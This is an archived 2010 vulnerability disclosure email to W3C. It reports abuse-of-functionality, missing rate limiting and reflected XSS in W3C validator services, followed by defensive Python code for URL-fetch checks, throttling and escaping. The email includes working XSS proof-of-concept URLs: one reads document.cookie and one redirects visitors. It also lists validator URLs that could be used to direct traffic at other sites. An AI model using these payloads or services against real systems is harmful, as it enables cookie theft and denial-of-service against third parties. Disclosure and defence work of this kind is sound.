
Vulnerabilities at www.w3.org

From: MustLive <mustlive@websecurity.com.ua>
Date: Wed, 30 Jun 2010 09:34:56 +0000
To: <admin@w3.org>, <site-comments@w3.org>
Message-Id: <007701cb1559$d0e25e80$010000c0@ml>
Hello administrator of www.w3.org!

I want to warn you about security vulnerabilities at your site.

These are Abuse of Functionality, Insufficient Anti-automation and  
Cross-Site Scripting vulnerabilities.

Abuse of Functionality:

This functionality can be used for conducting CSRF attacks on other sites.

http://validator.w3.org/feed/check.cgi?url=http://google.com

http://www.w3.org/2001/03/webdata/xsv?docAddrs=http://google.com&style=xsl

http://validator.w3.org/check?uri=http://google.com

http://jigsaw.w3.org/css-validator/validator?uri=http://google.com

http://validator.w3.org/checklink?uri=http://google.com

Note that the W3C Link Checker service can be used for scanning a whole site, and so it consumes more resources, both of W3C's server and of the site being scanned. It can be used for conducting DoS attacks on the mentioned servers. I wrote about such attacks in the article DoS attacks via Abuse of Functionality vulnerabilities (http://websecurity.com.ua/2981/).

http://qa-dev.w3.org/unicorn/check?ucn_uri=google.com&ucn_task=conformance

http://www.w3.org/RDF/Validator/ARPServlet?URI=http://google.com

Insufficient Anti-automation:

On these pages there is no protection from automated requests (captcha), which allows automating the process of conducting CSRF attacks on other sites.

XSS (IE):

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Ealert(document.cookie)%3C/script%3E&style=xsl

http://www.w3.org/2001/03/webdata/xsv?docAddrs=%3Cscript%3Edocument.location%3D%22http://websecurity.com.ua%22%3C/script%3E&style=xsl

Works only in Internet Explorer.

Attend to the security of all of your web sites and web software, and to security audits.

I mentioned these vulnerabilities at my site (http://websecurity.com.ua/4320/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
Received on Wednesday, 30 June 2010 12:11:33 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Wednesday, 24 October 2012 16:21:33 GMT
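The following is an added example, not code from W3C or from the reporter. It sketches the defensive checks a public "validate this URL" service can apply against the three issues reported in the message: a fetch-time check that refuses to retrieve attacker-chosen internal addresses, a per-client token bucket for requests that carry no CAPTCHA, and an error page that HTML-escapes the echoed `docAddrs` value and forbids MIME sniffing. The hostnames, addresses, client ids and limits are constructed, and `FAKE_DNS`/`fake_resolver` stand in for real DNS so the code runs offline.

```python
"""Defensive checks for a public "validate this URL" service (added example).

Models the three reported issues: the service fetching attacker-chosen URLs
on a client's behalf (abuse of functionality), no throttling of automated
requests (insufficient anti-automation), and a request parameter echoed
back unescaped (reflected XSS). All names and numbers are constructed.
"""
import html
import ipaddress
import socket
import time
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed stand-in for DNS so the checks can run offline.
FAKE_DNS = {
    "public.test": ["1.2.3.4"],
    "intranet.test": ["10.0.0.5"],
    "mixed.test": ["1.2.3.4", "127.0.0.1"],  # one public, one loopback record
}


def fake_resolver(host):
    """Same shape as resolve_all() but backed by FAKE_DNS (constructed)."""
    if host not in FAKE_DNS:
        raise OSError("NXDOMAIN (constructed)")
    return FAKE_DNS[host]


def resolve_all(host):
    """Real resolver: every IPv4 address for host (makes a network call)."""
    return socket.gethostbyname_ex(host)[2]


def is_internal(ip):
    """True for addresses a public fetcher must never contact."""
    return (ip.is_private or ip.is_loopback or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_url(url, resolver=resolve_all):
    """Return (ok, reason) for a URL the service was asked to fetch.

    Rejects non-HTTP schemes, URLs carrying credentials, and any host
    (IP literal or resolved name) with an internal address. Every resolved
    address is checked because one name may mix public and internal
    records. This does not stop the service being pointed at third-party
    public sites; pair it with the rate limit below.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if parts.username or parts.password:
        return False, "credentials in URL"
    try:
        addrs = [str(ipaddress.ip_address(host))]  # IP literal: no lookup
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError:
            return False, "unresolvable host"
    for addr in addrs:
        if is_internal(ipaddress.ip_address(addr)):
            return False, "host resolves to internal address %s" % addr
    return True, "ok"


class TokenBucket:
    """Per-client token bucket: a burst of `capacity` requests, refilled at
    `rate` tokens per second. The clock is injectable for offline tests."""

    def __init__(self, capacity, rate, clock=time.monotonic):
        self.capacity = capacity
        self.rate = rate
        self.clock = clock
        self.buckets = {}  # client id -> (tokens, time of last update)

    def allow(self, client):
        now = self.clock()
        tokens, last = self.buckets.get(client, (self.capacity, now))
        tokens = min(self.capacity, tokens + (now - last) * self.rate)
        if tokens < 1:
            self.buckets[client] = (tokens, now)
            return False
        self.buckets[client] = (tokens - 1, now)
        return True


def render_error(doc_addrs):
    """(headers, body) for a docAddrs value that could not be fetched.

    The echoed value is HTML-escaped, and the response declares its media
    type and forbids MIME sniffing; a reflected XSS that fires only in one
    browser is a classic sign of that browser sniffing an unlabelled or
    mislabelled response into HTML."""
    headers = {
        "Content-Type": "text/html; charset=utf-8",
        "X-Content-Type-Options": "nosniff",
    }
    body = "<p>Could not fetch document: %s</p>" % html.escape(doc_addrs, quote=True)
    return headers, body
```

In a real deployment `check_fetch_url` would be called with the default `resolve_all`, and the client id handed to `TokenBucket.allow` would be the requesting IP or session; the point of the injectable resolver and clock is that both checks can be unit-tested without network access or sleeping.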